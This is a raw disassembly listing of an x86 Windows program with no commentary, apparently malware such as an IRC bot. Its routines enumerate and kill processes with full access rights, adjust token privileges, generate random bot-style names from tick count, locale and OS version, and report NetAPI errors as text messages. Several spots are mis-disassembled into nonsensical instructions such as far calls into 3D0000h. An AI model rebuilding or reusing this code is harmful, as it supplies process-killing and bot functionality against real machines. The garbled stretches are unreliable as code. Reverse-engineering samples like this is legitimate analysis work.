sub_40EBC7 endp
; =============== S U B R O U T I N E =======================================
sub_40EC21 proc near ; CODE XREF: sub_40EAFC+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40E977
push [esp+8+arg_4]
mov esi, eax
call sub_40E977
pop ecx
pop ecx
push eax
push esi
call ds:dword_43067C
pop esi
retn
sub_40EC21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC42 proc near ; CODE XREF: sub_40EAFC+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_40E977
push [ebp+arg_4]
mov esi, eax
call sub_40E977
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_4307E8
test eax, eax
mov [ebp+arg_0], eax
jnz loc_40EFCF
mov eax, [ebp+var_4]
test eax, eax
jz loc_40F00A
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset dword_42D67C
push eax
call sub_41050B
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset dword_42D66C
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset dword_42D658
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset dword_42D64C
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40ED5B
dec eax
jz short loc_40ED54
dec eax
jz short loc_40ED4D
mov eax, offset dword_422F0C
jmp short loc_40ED60
; ---------------------------------------------------------------------------
loc_40ED4D: ; CODE XREF: sub_40EC42+102�j
mov eax, offset dword_429FB4
jmp short loc_40ED60
; ---------------------------------------------------------------------------
loc_40ED54: ; CODE XREF: sub_40EC42+FF�j
mov eax, offset dword_42D644
jmp short loc_40ED60
; ---------------------------------------------------------------------------
loc_40ED5B: ; CODE XREF: sub_40EC42+FC�j
mov eax, offset dword_42D63C
loc_40ED60: ; CODE XREF: sub_40EC42+109�j
; sub_40EC42+110�j ...
push eax
lea eax, [ebp+var_204]
push offset dword_42D628
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset dword_42D618
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset dword_42D604
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset dword_42D5F4
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset dword_42D5E0
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset dword_42D5C8
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset dword_42D5B0
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset dword_42D5A0
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset dword_42D590
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset dword_42D57C
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset dword_42D568
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset dword_42D554
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset dword_42D540
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset dword_42D52C
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset dword_42D518
push eax
call sub_41050B
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40E367
add esp, 20h
pop edi
pop ebx
jmp short loc_40EFFB
; ---------------------------------------------------------------------------
loc_40EFCF: ; CODE XREF: sub_40EC42+35�j
push eax
lea eax, [ebp+var_204]
push offset dword_42D4E0
push eax
call sub_41050B
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40E367
add esp, 20h
loc_40EFFB: ; CODE XREF: sub_40EC42+38B�j
cmp [ebp+var_4], 0
jz short loc_40F00A
push [ebp+var_4]
call ds:dword_430820
loc_40F00A: ; CODE XREF: sub_40EC42+40�j
; sub_40EC42+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_40EC42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F010 proc near ; CODE XREF: seg000:0040AC32�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_40E977
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset dword_42D720
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 18h
loc_40F04F: ; CODE XREF: sub_40F010+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call ds:dword_430708
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40F0B0
cmp eax, 0EAh
jz short loc_40F0B0
push eax
push eax
call sub_40F190
pop ecx
push eax
lea eax, [ebp+var_218]
push offset dword_42D6E8
push eax
call sub_41050B
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 24h
jmp short loc_40F12B
; ---------------------------------------------------------------------------
loc_40F0B0: ; CODE XREF: sub_40F010+62�j
; sub_40F010+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_40F13E
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_40F12B
loc_40F0C2: ; CODE XREF: sub_40F010+ED�j
cmp edi, esi
jz short loc_40F101
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset dword_42D6E0
push eax
call sub_41050B
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40F0C2
jmp short loc_40F12B
; ---------------------------------------------------------------------------
loc_40F101: ; CODE XREF: sub_40F010+B4�j
lea eax, [ebp+var_218]
push offset dword_42D6A0
push eax
call sub_41050B
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 1Ch
loc_40F12B: ; CODE XREF: sub_40F010+9E�j
; sub_40F010+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40F13E
push edi
call ds:dword_430820
xor edi, edi
mov [ebp+var_4], edi
loc_40F13E: ; CODE XREF: sub_40F010+A5�j
; sub_40F010+120�j
cmp [ebp+var_C], 0EAh
jz loc_40F04F
cmp edi, esi
jz short loc_40F156
push edi
call ds:dword_430820
loc_40F156: ; CODE XREF: sub_40F010+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset dword_42D688
push eax
call sub_41050B
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40F010 endp
; =============== S U B R O U T I N E =======================================
sub_40F190 proc near ; CODE XREF: sub_40E7E6+41�p
; sub_40E9DB+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40F242
jz loc_40F23B
cmp eax, 7Bh
ja short loc_40F207
jz short loc_40F1FD
cmp eax, 5
jz short loc_40F1F3
cmp eax, 8
jz short loc_40F1E9
cmp eax, 32h
jz short loc_40F1DF
cmp eax, 35h
jz short loc_40F1D5
cmp eax, 57h
jnz loc_40F291
push offset dword_42D9F0
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F1D5: ; CODE XREF: sub_40F190+30�j
push offset dword_42D9D8
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F1DF: ; CODE XREF: sub_40F190+2B�j
push offset dword_42D9B0
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F1E9: ; CODE XREF: sub_40F190+26�j
push offset dword_42D99C
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F1F3: ; CODE XREF: sub_40F190+21�j
push offset dword_42D98C
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F1FD: ; CODE XREF: sub_40F190+1C�j
push offset dword_42D974
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F207: ; CODE XREF: sub_40F190+1A�j
sub eax, 7Ch
jz short loc_40F234
sub eax, 7C8h
jz short loc_40F22D
dec eax
jz short loc_40F223
dec eax
jnz short loc_40F291
push offset dword_42D95C
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F223: ; CODE XREF: sub_40F190+84�j
push offset dword_42D938
jmp loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F22D: ; CODE XREF: sub_40F190+81�j
push offset dword_42D914
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F234: ; CODE XREF: sub_40F190+7A�j
push offset dword_42D8F8
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F23B: ; CODE XREF: sub_40F190+11�j
push offset dword_42D8C4
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F242: ; CODE XREF: sub_40F190+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40F27B
jz short loc_40F274
sub eax, 8ADh
jz short loc_40F2A6
dec eax
dec eax
jz short loc_40F26D
dec eax
jz short loc_40F266
dec eax
dec eax
jnz short loc_40F291
push offset dword_42D874
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F266: ; CODE XREF: sub_40F190+C9�j
push offset dword_42D850
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F26D: ; CODE XREF: sub_40F190+C6�j
push offset dword_42D834
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F274: ; CODE XREF: sub_40F190+BB�j
push offset dword_42D7D8
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F27B: ; CODE XREF: sub_40F190+B9�j
sub eax, 8CAh
jz short loc_40F2AD
sub eax, 17h
jz short loc_40F2A6
sub eax, 25h
jz short loc_40F29F
sub eax, 29h
jz short loc_40F298
loc_40F291: ; CODE XREF: sub_40F190+35�j
; sub_40F190+87�j ...
push offset dword_42D7BC
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F298: ; CODE XREF: sub_40F190+FF�j
push offset dword_42D79C
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F29F: ; CODE XREF: sub_40F190+FA�j
push offset dword_42D788
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F2A6: ; CODE XREF: sub_40F190+C2�j
; sub_40F190+F5�j
push offset dword_42D764
jmp short loc_40F2B2
; ---------------------------------------------------------------------------
loc_40F2AD: ; CODE XREF: sub_40F190+F0�j
push offset dword_42D744
loc_40F2B2: ; CODE XREF: sub_40F190+40�j
; sub_40F190+4A�j ...
push offset dword_45EFB0
call sub_41050B
pop ecx
mov eax, offset dword_45EFB0
pop ecx
retn
sub_40F190 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F2C4 proc near ; CODE XREF: seg000:0040AC77�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_4128E9
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call near ptr 3D0000h
push ss
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_4128E9
lea eax, [ebp+var_718]
push eax
call sub_4128CC
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call ds:dword_4307A4
test eax, eax
jnz short loc_40F354
mov esi, offset dword_45EDAC
push offset dword_42DA40
push esi
call sub_41050B
pop ecx
pop ecx
jmp short loc_40F37D
; ---------------------------------------------------------------------------
loc_40F354: ; CODE XREF: sub_40F2C4+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_40F190
pop ecx
mov esi, offset dword_45EDAC
push eax
push offset dword_42DA04
push esi
call sub_41050B
add esp, 14h
loc_40F37D: ; CODE XREF: sub_40F2C4+8E�j
mov eax, esi
pop esi
leave
retn
sub_40F2C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F382 proc near ; CODE XREF: sub_4070B7+7�p
; seg000:0040F44C�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call near ptr 3D0000h
arpl [eax-1], dx
adc eax, offset dword_430778
test eax, eax
jnz short loc_40F3A1
leave
retn
; ---------------------------------------------------------------------------
loc_40F3A1: ; CODE XREF: sub_40F382+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call ds:dword_430754
test eax, eax
jz short loc_40F3DF
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_40F3C8
or [ebp+var_8], 2
jmp short loc_40F3CC
; ---------------------------------------------------------------------------
loc_40F3C8: ; CODE XREF: sub_40F382+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_40F3CC: ; CODE XREF: sub_40F382+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call ds:dword_4307FC
mov esi, eax
loc_40F3DF: ; CODE XREF: sub_40F382+32�j
push [ebp+var_4]
call ds:dword_41C070 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_40F382 endp
; ---------------------------------------------------------------------------
loc_40F3ED: ; CODE XREF: seg000:0040D02B�p
; sub_40F59E+74�p
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp ds:dword_4307B4, ebx
lea edi, [ebp-128h]
mov [ebp-12Ch], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp-34Ch]
mov [ebp-350h], ebx
rep stosd
jz loc_40F597
cmp ds:dword_430798, ebx
jz loc_40F597
cmp ds:dword_4306C4, ebx
jz loc_40F597
push 1
push offset dword_42DA88
call sub_40F382
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_4307B4
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_40F58A
lea eax, [ebp-12Ch]
mov dword ptr [ebp-12Ch], 128h
push eax
push dword ptr [ebp-4]
call ds:dword_430798
mov esi, ds:dword_41C070
test eax, eax
jz loc_40F585
loc_40F490: ; CODE XREF: seg000:0040F4AB�j
; seg000:0040F4B9�j ...
lea eax, [ebp-12Ch]
push eax
push dword ptr [ebp-4]
call ds:dword_4306C4
test eax, eax
jz loc_40F585
cmp [ebp+18h], ebx
jnz short loc_40F490
cmp [ebp+14h], ebx
jnz loc_40F53D
cmp [ebp+0Ch], ebx
jz short loc_40F490
push dword ptr [ebp-124h]
push 8
call ds:dword_4307B4
cmp [ebp+1Ch], ebx
mov edi, eax
mov dword ptr [ebp-350h], 224h
jz short loc_40F4FA
lea eax, [ebp-350h]
push eax
push edi
call ds:dword_430674
push dword ptr [ebp-124h]
test eax, eax
jz short loc_40F500
lea eax, [ebp-230h]
jmp short loc_40F506
; ---------------------------------------------------------------------------
loc_40F4FA: ; CODE XREF: seg000:0040F4D8�j
push dword ptr [ebp-124h]
loc_40F500: ; CODE XREF: seg000:0040F4F0�j
lea eax, [ebp-108h]
loc_40F506: ; CODE XREF: seg000:0040F4F8�j
push eax
lea eax, [ebp-550h]
push offset dword_42DA7C
push eax
call sub_41050B
add esp, 10h
lea eax, [ebp-550h]
push 1
push dword ptr [ebp+10h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E367
add esp, 14h
push edi
call esi ; CloseHandle
jmp loc_40F490
; ---------------------------------------------------------------------------
loc_40F53D: ; CODE XREF: seg000:0040F4B0�j
push dword ptr [ebp+14h]
lea eax, [ebp-108h]
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40F490
push dword ptr [ebp-124h]
push ebx
push 1F0FFFh
call near ptr 3D0000h
loc_40F567: ; CODE XREF: seg000:0040F569�j
; seg000:loc_40F567�j
loop near ptr loc_40F567+1
jnz short loc_40F567
mov edi, eax
call esi ; CloseHandle
push ebx
push edi
call near ptr 3D0000h
call far ptr 0FF57h:575C085h
setalc
jmp short loc_40F597
; ---------------------------------------------------------------------------
push 1
pop eax
jmp short loc_40F599
; ---------------------------------------------------------------------------
loc_40F585: ; CODE XREF: seg000:0040F48A�j
; seg000:0040F4A2�j
push dword ptr [ebp-4]
call esi ; CloseHandle
loc_40F58A: ; CODE XREF: seg000:0040F462�j
push ebx
push offset dword_42DA88
call sub_40F382
pop ecx
pop ecx
loc_40F597: ; CODE XREF: seg000:0040F427�j
; seg000:0040F433�j ...
xor eax, eax
loc_40F599: ; CODE XREF: seg000:0040F583�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F59E proc near ; DATA XREF: seg000:0040DBC8�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset dword_42DB10
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_41050B
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_40F5FD
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40E367
add esp, 14h
loc_40F5FD: ; CODE XREF: sub_40F59E+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call loc_40F3ED
add esp, 18h
test eax, eax
jnz short loc_40F625
push offset dword_42DAD4
jmp short loc_40F62A
; ---------------------------------------------------------------------------
loc_40F625: ; CODE XREF: sub_40F59E+7E�j
push offset dword_42DA9C
loc_40F62A: ; CODE XREF: sub_40F59E+85�j
lea eax, [ebp+var_298]
push eax
call sub_41050B
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_40F65D
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40E367
add esp, 14h
loc_40F65D: ; CODE XREF: sub_40F59E+9D�j
lea eax, [ebp+var_298]
push eax
call sub_407E0E
push [ebp+var_14]
call sub_4102D3
pop ecx
pop ecx
push esi
call near ptr 3D0000h
sahf
pop edi
pop esi
sub_40F59E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F67C proc near ; CODE XREF: seg000:0040CFCD�p
; sub_4100F2+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call near ptr 3D0000h
db 65h
mov esi, eax
test esi, esi
jz short loc_40F6AE
push 0
push esi
call near ptr 3D0000h
dec ebp
test eax, eax
jnz short loc_40F6AE
push esi
xor edi, edi
call ds:dword_41C070 ; CloseHandle
loc_40F6AE: ; CODE XREF: sub_40F67C+1A�j
; sub_40F67C+27�j
mov eax, edi
pop edi
pop esi
retn
sub_40F67C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F6B3 proc near ; CODE XREF: sub_40318D+63�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_410567
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_41C648
call sub_410DD4
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_40F6B3 endp
; ---------------------------------------------------------------------------
push esi
push edi
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
mov edi, [esp+10h]
mov dword ptr [esp], offset dword_423094
push offset dword_41F970
push 1Ch
push edi
call sub_410A8A
xor esi, esi
add esp, 10h
cmp ds:dword_423010, esi
jle short loc_40F73C
loc_40F716: ; CODE XREF: seg000:0040F73A�j
call sub_410567
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42DBAC
push 1Ch
push edi
call sub_410A8A
add esp, 14h
inc esi
cmp esi, ds:dword_423010
jl short loc_40F716
loc_40F73C: ; CODE XREF: seg000:0040F714�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_40F741 proc near ; CODE XREF: seg000:0040C769�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
pop ecx
call sub_410567
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, ds:dword_423010
test esi, esi
jle short loc_40F784
loc_40F76E: ; CODE XREF: sub_40F741+41�j
call sub_410567
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40F76E
loc_40F784: ; CODE XREF: sub_40F741+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40F741 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
pop ecx
lea eax, [ebp-8]
mov esi, offset dword_42DBB4
push eax
push esi
call near ptr 3D0000h
arpl [edi], cx
mov esi, 42DBB405h
add [edx+41h], ch
pop ecx
push 1
pop edx
loc_40F7CA: ; CODE XREF: seg000:0040F7D5�j
cmp eax, ecx
jnz short loc_40F7D1
mov [ebp-4], edx
loc_40F7D1: ; CODE XREF: seg000:0040F7CC�j
inc ecx
cmp ecx, 5Bh
jl short loc_40F7CA
push 61h
pop ecx
loc_40F7DA: ; CODE XREF: seg000:0040F7E5�j
cmp eax, ecx
jnz short loc_40F7E1
mov [ebp-4], edx
loc_40F7E1: ; CODE XREF: seg000:0040F7DC�j
inc ecx
cmp ecx, 7Bh
jl short loc_40F7DA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_410A8A
xor esi, esi
add esp, 0Ch
cmp ds:dword_423010, esi
jle short loc_40F826
loc_40F800: ; CODE XREF: seg000:0040F824�j
call sub_410567
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42DBAC
push 1Ch
push edi
call sub_410A8A
add esp, 14h
inc esi
cmp esi, ds:dword_423010
jl short loc_40F800
loc_40F826: ; CODE XREF: seg000:0040F7FE�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_41C130 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_42DBB8
push 1Ch
push edi
call sub_410A8A
xor esi, esi
add esp, 10h
cmp ds:dword_423010, esi
jle short loc_40F89B
loc_40F875: ; CODE XREF: seg000:0040F899�j
call sub_410567
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42DBAC
push 1Ch
push edi
call sub_410A8A
add esp, 14h
inc esi
cmp esi, ds:dword_423010
jl short loc_40F875
loc_40F89B: ; CODE XREF: seg000:0040F873�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset dword_42F3E8
mov dword ptr [ebp-94h], 94h
call ds:dword_41C0EC ; GetVersionExA
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_40F925
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40F905
cmp dword ptr [ebp-84h], 1
jnz short loc_40F8F5
mov esi, offset dword_422B04
loc_40F8F5: ; CODE XREF: seg000:0040F8EE�j
cmp dword ptr [ebp-84h], 2
jnz short loc_40F961
mov esi, offset dword_422B00
jmp short loc_40F961
; ---------------------------------------------------------------------------
loc_40F905: ; CODE XREF: seg000:0040F8E5�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_40F915
mov esi, offset dword_422AFC
jmp short loc_40F961
; ---------------------------------------------------------------------------
loc_40F915: ; CODE XREF: seg000:0040F90C�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_40F95C
mov esi, offset dword_422AF8
jmp short loc_40F961
; ---------------------------------------------------------------------------
loc_40F925: ; CODE XREF: seg000:0040F8DC�j
cmp dword ptr [ebp-90h], 5
jnz short loc_40F95C
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40F93E
mov esi, offset dword_422AF4
jmp short loc_40F961
; ---------------------------------------------------------------------------
loc_40F93E: ; CODE XREF: seg000:0040F935�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_40F94E
mov esi, offset dword_422AF0
jmp short loc_40F961
; ---------------------------------------------------------------------------
loc_40F94E: ; CODE XREF: seg000:0040F945�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_42DBC4
jz short loc_40F961
loc_40F95C: ; CODE XREF: seg000:0040F91C�j
; seg000:0040F92C�j
mov esi, offset dword_422AE4
loc_40F961: ; CODE XREF: seg000:0040F8FC�j
; seg000:0040F903�j ...
mov edi, [ebp+8]
push esi
push offset dword_42DBBC
push 1Ch
push edi
call sub_410A8A
